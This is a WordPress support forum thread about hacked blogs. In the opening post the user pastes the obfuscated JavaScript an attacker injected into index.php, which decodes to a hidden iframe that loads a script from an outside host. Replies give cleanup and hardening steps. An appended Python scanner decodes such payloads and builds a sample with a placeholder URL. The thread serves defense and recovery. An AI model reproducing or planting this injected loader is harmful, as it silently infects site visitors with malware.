• Both of my WordPress blogs were hacked on May 9th. One was an old version (I deleted it), the other is the latest up-to-date version. Here is the code inserted into the index.php file by the hacker:

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?><?php echo ''; ?><?php echo '<script type="text/javascript">var GdpldPBsdvjorQSwfbuS = "kw60kw105kw102kw114kw97kw109kw101kw32kw119kw105kw100kw116kw104kw61kw34kw52kw56kw48kw34kw32kw104kw101kw105kw103kw104kw116kw61kw34kw54kw48kw34kw32kw115kw114kw99kw61kw34kw104kw116kw116kw112kw58kw47kw47kw100kw111kw119kw110kw108kw111kw97kw100kw45kw49kw50kw51kw46kw99kw110kw47kw118kw116kw105kw97kw100kw109kw105kw110kw50kw47kw116kw46kw112kw104kw112kw34kw32kw115kw116kw121kw108kw101kw61kw34kw98kw111kw114kw100kw101kw114kw58kw48kw112kw120kw59kw32kw112kw111kw115kw105kw116kw105kw111kw110kw58kw114kw101kw108kw97kw116kw105kw118kw101kw59kw32kw116kw111kw112kw58kw48kw112kw120kw59kw32kw108kw101kw102kw116kw58kw45kw53kw48kw48kw112kw120kw59kw32kw111kw112kw97kw99kw105kw116kw121kw58kw48kw59kw32kw102kw105kw108kw116kw101kw114kw58kw112kw114kw111kw103kw105kw100kw58kw68kw88kw73kw109kw97kw103kw101kw84kw114kw97kw110kw115kw102kw111kw114kw109kw46kw77kw105kw99kw114kw111kw115kw111kw102kw116kw46kw65kw108kw112kw104kw97kw40kw111kw112kw97kw99kw105kw116kw121kw61kw48kw41kw59kw32kw45kw109kw111kw122kw45kw111kw112kw97kw99kw105kw116kw121kw58kw48kw34kw62kw60kw47kw105kw102kw114kw97kw109kw101kw62";var cyFDWFBHQiyWMnIpDJig = GdpldPBsdvjorQSwfbuS.split("kw");var ERVwiosNQnfsmlwIqxQG = "";for (var gOdsCliGvQnAiIwQxpeN=1; gOdsCliGvQnAiIwQxpeN<cyFDWFBHQiyWMnIpDJig.length; gOdsCliGvQnAiIwQxpeN++){ERVwiosNQnfsmlwIqxQG+=String.fromCharCode(cyFDWFBHQiyWMnIpDJig[gOdsCliGvQnAiIwQxpeN]);}document.write(ERVwiosNQnfsmlwIqxQG)</script>'; ?>

    You can view the hacked page at [link removed] (WARNING – this may install a virus on your machine!)

Viewing 6 replies - 1 through 6 (of 6 total)
  • You need to also look in all index files of any type on your site.
    Also inform your host if on a shared server, as others were likely hacked as well.

    matthewcainnewscountercom

    (@matthewcainnewscountercom)

    What do you do to get rid of the hack?

    Thread Starter geraldz

    (@geraldz)

    I’m waiting for WordPress to issue a release. I restored my backup index file.

    Check the db for stuff, or an upgrade will only carry the hack forward.

    Matthew – you can google for how to handle hacks or search this forum, as it comes up often.

    Thread Starter geraldz

    (@geraldz)

    Hi Samboll – you are correct; all of the index files on my shared server were hacked.

    I have changed my file permissions to 444 (read only) which seems to have stopped the attacks.

    I have looked at the database but did not notice anything suspicious. What should I be looking for?

    Thanks for your help!

    General fix advice:
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://wordpress.org/search/hacked?forums=1

    Make sure that your files on the server are clean. If that means deleting and reuploading, then you ought to do that. Files that you don't replace should be looked at.

    Check for files that don't belong, directories that don't belong. Image files with changed timestamps — look at those. It's VERY common for there to be scripts on sites that are named in such a way to mask the fact that they're scripts.

    Be suspicious when you're looking at things. For instance, if you look at your wp-content/index.php — even that file has the malicious JS in it…

    Look at your permissions. Do you have world writable files? Any world-writable directories? Are they necessary?

    You need to check your database. Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.

    Make sure ALL of your plugins are current.

    Make sure your WordPress is current.

    Change your MySQL password that WordPress uses (update your wp-config.php with that new password).

    Change your FTP password.

    Change any admin level passwords on your blog.

    Look at any other software that's being used on your site. Is it current?

    That's just an outline and not a complete list.

    There’s quite a bit to do, but it’s all necessary.

    If you can't do it all — by all means don't hesitate to enlist the help of someone who can. Quite a few of us do work on the side.

    If you aren't archiving access logs, you ought to be, especially now.

    There's also this:

    http://codex.wordpress.org/Hardening_WordPress

    There’s also gumblar and various iterations, variations, clones, and whatnot, going around. Getting rid of gumblar, etc. means you also need to make sure that the remote computers being used to access your site’s FTP are clean. By that, I mean they need to be scanned for malware, and any found, removed.
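Two of the checks named in the replies above (every index file, world-writable files) can be automated; the following is an added example, not code from this thread. It statically decodes the split()/String.fromCharCode encoding shown in the first post, reading the delimiter from the split() call so it is not limited to "kw". The function names, the sample tree and the bad.example URL are constructed for illustration.

```python
import os
import re
import stat
import tempfile

ASSIGN = re.compile(r'var\s+(\w+)\s*=\s*"([^"]{8,})"')   # var X = "kw60kw105..."
SRC = re.compile(r'src\s*=\s*["\']([^"\']+)', re.I)      # URL inside decoded markup

def decode_charcode_blobs(text):
    """Statically rebuild strings hidden as <delim><charcode> runs; executes no script."""
    decoded = []
    for name, blob in ASSIGN.findall(text):
        m = re.search(re.escape(name) + r'\.split\("([^"]+)"\)', text)
        codes = blob.split(m.group(1))[1:] if m else []   # element 0 is empty; the loop starts at 1
        if "fromCharCode" in text and codes and all(re.fullmatch(r"\d{1,6}", c) for c in codes):
            decoded.append("".join(chr(int(c)) for c in codes))
    return decoded

def scan_tree(root):
    """Return (path, finding, detail) for world-writable files and encoded index.* payloads."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in sorted(files):
            path = os.path.join(dirpath, fn)
            try:
                if os.stat(path).st_mode & stat.S_IWOTH:
                    findings.append((path, "world-writable", ""))
                if not fn.lower().startswith("index."):
                    continue
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for markup in decode_charcode_blobs(text):
                findings.append((path, "encoded-markup", ", ".join(SRC.findall(markup))))
    return findings

def build_sample_tree():
    """Constructed sample: an index.php carrying the same encoding with a placeholder URL."""
    root = tempfile.mkdtemp()
    enc = "".join("kw%d" % ord(ch) for ch in '<iframe src="http://bad.example/t.php"></iframe>')
    js = ('<script>var a = "%s";var b = a.split("kw");var c = "";for (var i=1; i<b.length; i++)'
          '{c+=String.fromCharCode(b[i]);}document.write(c)</script>' % enc)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php require('./wp-blog-header.php'); ?><?php echo '%s'; ?>" % js)
    return root

if __name__ == "__main__":
    print(scan_tree(build_sample_tree()))
```

Point `scan_tree()` at the web root; a clean result covers only these two checks, not the database or the other items in the outline above.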

  • The topic ‘WordPressed Hacked!’ is closed to new replies.